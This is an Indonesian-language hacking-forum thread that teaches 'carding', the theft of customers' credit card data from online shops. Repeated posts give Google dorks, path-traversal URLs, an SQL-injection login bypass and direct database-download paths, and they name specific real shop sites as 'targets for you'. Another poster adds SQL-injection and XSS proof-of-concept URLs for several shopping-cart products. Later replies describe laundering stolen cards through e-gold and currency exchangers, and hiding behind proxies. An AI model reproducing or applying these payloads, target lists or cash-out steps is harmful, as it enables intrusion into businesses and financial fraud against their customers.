OK2... BadKiddeS lht ternyata bnyk tmn2 forum yg teratrik menjadi carder juga :D ini BadKiddeS kasih sedikit cara buat dapetin CC...???
ini contoh bbrp Bugs'nya :

1. google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
trus copy-paste tuch log'nya di notepad biar gampang di baca

contoh target buat kalian :
www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
www.lilypadbulbs.com/cgi-bin/store/index.cgi?page=Returns%20and%20Guarantees.htm

2. keword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

kl target lainnya ga bs berarti dah di patch ma adminnya :D

3. Keyword : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces

4. keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
dah keduluan ma carder yang lain... cari target lain ok..??:>

5. keyword : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : www.successlink.org/store/proddetail.asp?prod=SL-IP0001
masukin bugsnya : www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..

sampai jumpa di bugs berikutnya, doai'n BadKiddes dapet bugsnya yach tmn2 ;)

Tehnik nomor 1 ..
/swt gede2x .. Tua amat mas tehniknya?? Emang masih banyak CC yang bisa dipakek kalau dapat dari tehnik itu?!

Tehnik nomor 2 ..
Nama bugs nya SQL Injection .. /heh
Old but still own!!! Tapi kebanyakan website e-commerce gede gak akan kena ini ..

Tehnik nomor 3 ..
Saya tambahkan sedikit ..

http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password&
#37;2C3%2C4+from+admin_users+%27+&cmdSearch=Search
SQL Injection ..

Tehnik nomor 4 ..
PDshop Pro .. Bugs nya ada di mana mana dan kebanyakan sudah hilang, karena ini merupakan Vulnerabilities lama sekali .. More than that .. Daripada anda menggunakan dbsetup.asp .. Anda juga bisa melakukan SQL Injection di kebanyakan PDshop Pro thingie ..

Another MDB technique di nomor 5 ..
Hmm ..

Ini ada beberapa tehnik yang mgkn bisa saya bagikan ..
Bukan tehnik yang l33t .. As we know, carding kebanyakan hanya menggunakan logika .. Tapi berikut adalah tehnik2 terbaru ..
Tehnik2 dibawah ini .. Kebanyakan masih bekerja dengan cukup baik, since the report of those abuses coming on 2006 .. /heh

Lizard Cart CMS
Google Dork: inurl: /lizard/pages.php?
PoC:
http://www.example.com/lizard/pages.php?id=-1'%20union%20select%201,2,3/*
http://www.example.com/lizard/detail.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8/*

Comersus ..
Http://[Target]/[Path]/database/comersus.mdb

PPCal Shopping Cart
http://www.example.com/ppcal.cgi?action=shop&user=8001&start=21
&stop=%22%3E%3Cscript%3Ealert('Tested by Th0R')%3C
/script%3E

http://www.example.com/ppcal.cgi?action=shop&user=%22%3E%3Cscri
pt%3Ealert('Tested by Th0R')%3C/script%3E

CS-Cart:
http://www.example.com/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=&x=11&y=3&sort_by=[SQL]
http://www.example.com/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=%27&x=11&y=3&sort_by=product&sort_order=[SQL]

A-Cart:
http://host/category.asp?catcode=1%20union%20all%20select%20pa ss,0,0,0,0
%20f
rom%20customers%20where%20fname='[Username]'

Anyway ..
Mr. Badkiddies ..
Thanks for posting the way of carding here .. /heh
But the best way for carding is not looking for CC's .. If u have a look on Indonesia and Australia Citibank webpage ..
U will see something REALLLLYYYYYY interesting there ..
Combine it with the technique teached in H.O.P.E Conference kemarin .. /no1

Thanks.
Th0R

Hmm... thx thor & badkiddies , saya sering membuat data dalam mdb cc card data penjualan dsb, melihat tehnik2 diatas saya jadi lebih membuka mata. Untung saya tidak pernah naruh mdb dalam root, mengingat semua path itu mengarah ke root public,jelas gampang terdownload.
Jadi sementara ini data customer saya sampai saat ini aman2 saja,
Maap kl gw salah nulis.

mantap.member2 IF yg bsa dibilang hacker bertambah :D

Berguna banget ne bos........... GRP buat ente!

badkiddies = Carder / Hacker .. /heh

Th0R = Jangan pernah dipanggil hacker / carder / cracker / phreaker / apalah .. Just a mere Internet User, NEW Super Mario Bros Player and Tetris OLD PLayer ..

Thanks.
Th0R

wow...
ini toh thread yg sempet ketutup........

anyway....
cc number apaan?
carding = hacking?
jelazin plz

BadKiddes bukan h4ck3r koq.. I know nothing... cc number apaan?
carding = hacking?
jelazin plz

CC = Credit Card
carding ga sama dgn hacking... carding menggunkan celah dr website penyedia layanan cart or shop (webshop) dlm setiap modus operandinya.
nach kalo kita sdh mendapatkan CC, kita bs belanja dgn cc orang yg kita maling... tapi berhubung skrg Proxy Indonesia sdh di 'block" jadi kita gak bs belanja lagi.. :(
trus buat apa donk CCnya BadKiddeS ???
jawabnya : dibikin duit
caranya : setelah kita mendapatkan CC yg Valid, langkah selanjutnya kita buat account di e-go (http://www.e-gold.com)ld trus buat Account juga di indocharger (http://www.indocharger.com)untuk mengubah mata uang dari $ ke Rp atao sebaliknya.
nach setelah kita buat e-gold dan Indocharger... mainin dech itu CC di e goldnya :D entar kl tmn2 pinter maininnya.. setelah dicairkan, duitnya langsung di transfer ke rekening kalian lewat indocharger td...

wah ini yg ane demen...
hacking gak dapet apa2 kan kita?
ya setidak nya carding dapat la...
cmn bener2 masi newbie...
tp keren ^^
gw suka gaya lo :P

badkiddies = Carder / Hacker .. /heh

Th0R = Jangan pernah dipanggil hacker / carder / cracker / phreaker / apalah .. Just a mere Internet User, NEW Super Mario Bros Player and Tetris OLD PLayer ..

Thanks.
Th0R
gw ga ngerti... lo ko ga mau dipanggil hacker? sedang lo sepertinya tau banyak tentang teknik2 tsb? apa ada alasan khusus? yah... bukan urusan gw si...sorry for asking...

btw, gw tetep ga ngerti...(culun amat neh/swt). itu semua link2 yang dikasih ga jalan sih? emang ga jalan apa gw yang ga ngerti?

mungkin th0r maonya dipanggil security consultant,
btw @aya
jalan c jalan cma pas g download mdb nya ud ga ada cc nya --;

yang mana aja yang jalan? kalo gw ko "ERROR The requested URL could not be retrieved."??

wa sama kek ueto aya'
ERROR The requested URL could not be retrieved."??

Thor mawnya dipanggil gamer..
biz maennya tetris ma mario bros molo
@thor
ia gak?
LOL

yang mana aja yang jalan? kalo gw ko "ERROR The requested URL could not be retrieved."??
waduh,g koq jalan selaen punya th0r yg example.com >:D<

wow mantap trik nya walaupun gw gak ngerti 100%,

keword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

kl target lainnya ga bs berarti dah di patch ma adminnya


khan BadKiddes bilang kl bugs nya ga jalan, berarti websitenya dah di patch ma adminnya.... tp sample yg gw kasih jalan koq blm di patch ma adminnya... coba lagi aja.. bugs ini BadKiddes temukan 1 bulan yg lalu jadi kemungkinan besar dah bnyk korban yg di patch ma adminnya... (hbs tahu ini forum baru sich) entar kl ada bugs baru, BadKiddes lgsg post disini dech...

badkiddies tukang hack CC yah,aktif cuma di Security & Hacking



incidendo alla vita
speranza giusta essere un incisioner

BadKiddes bukan tukang CC...?? ;) itu cuma sambilan mas... apa sich yg bs BadKiddes lakukan...??? I'm still under 17 years old...

BadKiddes bukan tukang CC...?? ;) itu cuma sambilan mas... apa sich yg bs BadKiddes lakukan...??? I'm still under 17 years old...
hah bad kiddies sambilannya tukang credit card?!?
sekolah dulu yang bener,nanti baru cari kerja tukang credit card :))
j/k

btw gud work :x

@badkiddies
keep posting
mantab kale..
wa masi belajar
mohon bimbingannya kk

saran... ati ati broh kena Log... mending pake Proxy... /swt /swt

badkiddies blh tau ndak cara bs jd cardding? aku suka tuh ma berbau uang...
bagus bener neh gaya kamu, aku juga masi 19thn, kalau boleh belajar dimana bs bicara? serius neh bad. neh email aku aldy_young@yahoo.co.id
informasinya di tg neh
thx ya bad

oh ya bad nyari proxy nya kek mana?, kalau proxy tuh beli apa ambil punya org?
kalau ambil ajarin juga ya,aku mau ambil punya org us,bs bantu? plz email aku ya
di ym juga bs
thx lagi neh 2 kali

@adli ..
Ur posts (Which were double posting), merged by m3h ..

Thanks.
Th0R

badkiddies blh tau ndak cara bs jd cardding? aku suka tuh ma berbau uang...
bagus bener neh gaya kamu, aku juga masi 19thn, kalau boleh belajar dimana bs bicara? serius neh bad. neh email aku aldy_young@yahoo.co.id
informasinya di tg neh
thx ya bad

oh ya bad nyari proxy nya kek mana?, kalau proxy tuh beli apa ambil punya org?
kalau ambil ajarin juga ya,aku mau ambil punya org us,bs bantu? plz email aku ya
di ym juga bs
thx lagi neh 2 kali
yang gratis buanyakk bisa cari di google

bwat om-om semua klo kita dah dapet cc trus mo nukarin e-gold dimana?
kasih tau dunk site-nya?

thanks

bwat om-om semua klo kita dah dapet cc trus mo nukarin e-gold dimana?
kasih tau dunk site-nya?

thanks
situ beliin e-gold.. setela sampe silakan dituker... /swt

maksud jurig situs bwat beli egold pke cc yng kita dapet tadi om..

gampang om, kita khan punya om google yang bisa nyediain segalanya,.......
cari aja disitu dengan topik yang kita cari, trs tandain deh halaman dari Indonesia, dah pasti dapet tuh /heh

cara nyari e-gold number gimana??

Ini ada beberapa tehnik yang mgkn bisa saya bagikan ..
Bukan tehnik yang l33t .. As we know, carding kebanyakan hanya menggunakan logika .. Tapi berikut adalah tehnik2 terbaru ..
Tehnik2 dibawah ini .. Kebanyakan masih bekerja dengan cukup baik, since the report of those abuses coming on 2006 ..

Lizard Cart CMS
Google Dork: inurl: /lizard/pages.php?
PoC:
http://www.example.com/lizard/pages.php?id=-1'%20union%20select%201,2,3/*
http://www.example.com/lizard/detail.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8/*

Comersus ..
Http://[Target]/[Path]/database/comersus.mdb

PPCal Shopping Cart
http://www.example.com/ppcal.cgi?act...=8001&start=21
&stop=%22%3E%3Cscript%3Ealert('Tested by Th0R')%3C
/script%3E

http://www.example.com/ppcal.cgi?act...=%22%3E%3Cscri
pt%3Ealert('Tested by Th0R')%3C/script%3E

CS-Cart:
http://www.example.com/index.php?tar...1&y=3&sort_by=[SQL]
http://www.example.com/index.php?tar...ct&sort_order=[SQL]

A-Cart:
http://host/category.asp?catcode=1%2...pa ss,0,0,0,0
%20f
rom%20customers%20where%20fname='[Username]'
------------------------------------------------------------------------------------------------------------------------------------------

:( :( :( ga bisa juga trik yang ini................................!!!!!!!!!!!!!!! !!!!!!!???????????????:( :( :( :(

badkiddes menerima bikin acc gk gw males cari2 cc butuh yg dah jadi aja. gmn mo gk? ex hxxp:www.casseyscam.com bisa nda?

OK2... BadKiddeS lht ternyata bnyk tmn2 forum yg teratrik menjadi carder juga :D ini BadKiddeS kasih sedikit cara buat dapetin CC...???
ini contoh bbrp Bugs'nya :

1. google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
trus copy-paste tuch log'nya di notepad biar gampang di baca

contoh target buat kalian :
Cashwell Appliance Parts Inc (http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm)
The Lilypad - Online Shopping (http://www.lilypadbulbs.com/cgi-bin/store/index.cgi?page=Returns%20and%20Guarantees.htm)

2. keword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

kl target lainnya ga bs berarti dah di patch ma adminnya :D

3. Keyword : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp (http://www.garrysun.com/ashopkart20/addprod.asp)
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb (http://www.garrysun.com/ashopkart20/admin/scart.mdb)
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces

4. keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : Little SPORT (http://www.littlesport.net/shop/category.asp?catid=2)
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp (http://www.littlesport.net//admin/dbsetup.asp)
kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
dah keduluan ma carder yang lain... cari target lain ok..??:>

5. keyword : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : Display Products (http://www.successlink.org/store/proddetail.asp?prod=SL-IP0001)
masukin bugsnya : www.successlink.org/store/fpdb/vsproducts.mdb (http://www.successlink.org/store/fpdb/vsproducts.mdb)
download file .mdbnya trus buka pake MS- ACCESS..

sampai jumpa di bugs berikutnya, doai'n BadKiddes dapet bugsnya yach tmn2 ;)


ada system yng baru ga boossss:-O

khan BadKiddes bilang kl bugs nya ga jalan, berarti websitenya dah di patch ma adminnya.... tp sample yg gw kasih jalan koq blm di patch ma adminnya... coba lagi aja.. bugs ini BadKiddes temukan 1 bulan yg lalu jadi kemungkinan besar dah bnyk korban yg di patch ma adminnya... (hbs tahu ini forum baru sich) entar kl ada bugs baru, BadKiddes lgsg post disini dech...



---------------------------------------------------------------
:-/ :-/ :-/

mokon bimbingan ato ada bug yang baru ga ya....:-/

Aduh Si BadkIddies Bener Ebat salut Gw Loe Bukan Sekedar Pemuda Biasa Tp U has A good Person Eh BTw Umur Loe Sama Ama Gw Tp Gw Cuman Bisa Leechers,Gw Blajar Dr Loe BadKiddIes

"KEEP TRYING U`R BeST"

badd cara yang kelima utk dapetin CC kalo dibuka pake MS- access koq nggak ada CC number nya .Koq masih berupa kode ?

jawabannya tak tunggu OK ? ke hendx_endx@yahoo.com


thanks bangggget!!!!!!!!!!!h

bad kiss pada kemana?
gapernah posting lagi ya,,....

OK2... BadKiddeS lht ternyata bnyk tmn2 forum yg teratrik menjadi carder juga :D ini BadKiddeS kasih sedikit cara buat dapetin CC...???
ini contoh bbrp Bugs'nya :

1. google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
trus copy-paste tuch log'nya di notepad biar gampang di baca

contoh target buat kalian :
Cashwell Appliance Parts Inc (http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm)
The Lilypad - Online Shopping (http://www.lilypadbulbs.com/cgi-bin/store/index.cgi?page=Returns%20and%20Guarantees.htm)

2. keword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

kl target lainnya ga bs berarti dah di patch ma adminnya :D

3. Keyword : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example : Shopping cart items (http://www.garrysun.com/ashopkart20/addprod.asp)
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces

4. keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
dah keduluan ma carder yang lain... cari target lain ok..??:>

5. keyword : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : Display Products (http://www.successlink.org/store/proddetail.asp?prod=SL-IP0001)
masukin bugsnya : www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..

sampai jumpa di bugs berikutnya, doai'n BadKiddes dapet bugsnya yach tmn2 ;)



badkiddes, gw nih dah dapat comersus.mdb - nya, tapi semua password n cc nya di encrypt dengan menggunakan RC4, nah skarang gimana men-dekrip data tersebut??:( . dah banyak site yang aq kunjungi tapi satupun gak ada yang kasih tau listingnya. HELP ME PLEASE, HELP ME PLEASE kawan-kawan

Halo kawan-kawan sejagat n setanah air, HELP ME PLEASE. aq gak tau tentang logika ato algoritma RC4. kalo kawan-kawan ada tau tolong bantu aku y, aku dah coba buat dari VB6,memang dah jalan tapi aku men-enkrip data yang terdekrip malah hasil yang keluar adalah karakter-karakter setan :)
spt tanda tanya terbalik dll. pada hal yang aku inginkan bukan seperti itu.
HELP..........:(

Biar lebih cepet di tangkap ilmunya dibuat videonya aja ^^, kan lebih mudah tuh:D

Klo video jangan entar orang langsung curiga bro....

wah gua kagak ngerti nih...
bisa beri tahu langsung CC yg bisa digunakan
ama name and pass juga donk

asli tambah kagak ngerti gwe nge hack CC... yang udah masak na aja plizz:D mo shoping bokep nech :x

BadKiddes bukan h4ck3r koq.. I know nothing...

CC = Credit Card
carding ga sama dgn hacking... carding menggunkan celah dr website penyedia layanan cart or shop (webshop) dlm setiap modus operandinya.
nach kalo kita sdh mendapatkan CC, kita bs belanja dgn cc orang yg kita maling... tapi berhubung skrg Proxy Indonesia sdh di 'block" jadi kita gak bs belanja lagi.. :(
trus buat apa donk CCnya BadKiddeS ???
jawabnya : dibikin duit
caranya : setelah kita mendapatkan CC yg Valid, langkah selanjutnya kita buat account di e-go (http://www.e-gold.com)ld trus buat Account juga di indocharger (http://www.indocharger.com)untuk mengubah mata uang dari $ ke Rp atao sebaliknya.
nach setelah kita buat e-gold dan Indocharger... mainin dech itu CC di e goldnya :D entar kl tmn2 pinter maininnya.. setelah dicairkan, duitnya langsung di transfer ke rekening kalian lewat indocharger td...
bisa kasi tau gak cara mainin egold! sy denger dah banyak yng gak nerima cc tuk beli egold!